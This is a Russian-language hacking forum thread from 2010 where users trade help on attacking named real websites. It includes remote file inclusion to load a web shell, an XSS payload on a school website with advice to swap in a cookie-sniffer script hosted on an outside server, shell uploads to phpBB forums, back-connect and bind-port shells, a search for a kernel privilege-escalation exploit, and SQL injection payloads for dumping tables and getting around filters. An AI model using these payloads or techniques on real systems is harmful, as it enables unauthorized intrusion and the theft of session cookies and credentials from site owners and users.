Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    почти уверен что тут админки нету,скорее всего сайт админится через фтп!
     
  2. melky

    melky New Member

    Joined:
    7 Apr 2010
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    http://www.prodisney.ru/index.php?page=GPI

    все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?

    пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)
     
  3. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    здесь нету RFI
     
  4. melky

    melky New Member

    Joined:
    7 Apr 2010
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    http://www.prodisney.ru/index.php?page=http://google.ru/index.php
     
  5. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Там фреймы
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    не канает метод шанкара... остальные тожe,
    когда аватарку загружаю выдает вот это

    Unable to upload file

    DEBUG MODE

    Line : 251
    File : usercp_avatar.php

    Что посоветуете?
     
  7. -oleg-

    -oleg- New Member

    Joined:
    8 Apr 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а какие остальные? В подпись eval пробовал совать? Есть вопросы - PM

    PS: решено)
     
    #12248 Pashkela, 8 Apr 2010
    Last edited: 8 Apr 2010
    1 person likes this.
  9. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12
    http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script>
    вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)
     
    3 people like this.
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link .Всем рекомендую.
     
  11. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
    не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
    P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    SAFE MODE: ?
     
  13. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    SAFE MODE OFF
     
  14. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    как инъекцию раскрутить если фильтруются скобки, то есть к примеру @@version проходит, а version() нет ?
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    писать запросы без скобок

    union+select+1,2,table_name+from+information_schema.tables

    ни одной скобки, уау

    PS: Без юзера и прочих параметров как-нибудь можно пережить трагедию
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    Mod_secutity или прочее.

    А зачем тебе в tables лезть то? в columns - все что нужно.
     
    2 people like this.
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    where column_name like(0x70617373) or column_name like(0x61646d696e) or column_name like(0x75736572) ..........
     
  18. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    вопрос по скуле) я в логине ввожу "логин пользователя' or 1=1 -- " мне выдало ошибку Ошибка разбора XML: синтаксическая ошибка (Строка: 11, Символ: 36)

    Обработать документ как HTML
    Ошибка:invalid start-tag

    в ошибке выделена красным первая буква логина a

    HTML:
     8: </head>   9: <card id="main" title="Lost Paradise">  10: <p>Ваш персонаж покинул игру из-за бездействия в течение 4 минут.  11: <br/><a href="game.php?login=user.\"ambal\\\' or 1=1 -- \"&amp;p=&amp;r=6631&amp;p=&amp;site=connect2">Войти</a> в игру  12: <br/>---<br/><a href="game.php?sid=user.\"ambal\\\' or 1=1 -- \"&amp;p=&amp;r=6631&amp;r=4299">[В игру]</a></p>  13: </card></wml>
    из за чего?
    просто xml я не знаю... подскажите кто-нибудь.
     
    #12258 гаррет-тень, 9 Apr 2010
    Last edited: 9 Apr 2010
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    скорей всего данные в браузер идут как xml, а там твой логин с кавычкой, который ты вводил - а в xml кавычку нужно в html-сущность переводить, иначе ошибка.
    В общем, к скуле это имеет отдаленное отношение, плюс ко всему - там MQ on.
     
  20. Linkus

    Linkus Member

    Joined:
    20 Dec 2008
    Messages:
    168
    Likes Received:
    15
    Reputations:
    -1
    В общем не знаю там ли написал, но вот такой вот вопрос ребята. В некой БД как то странно время вычисляется в виде цифр, в колонке time к примеру 1269553831 или 1269554171 . Я так понимаю это какая то зашифрованная дата или цифра. Как расшифровать? И можно ли цифру преобразовать в такой код.
     
Thread Status:
Not open for further replies.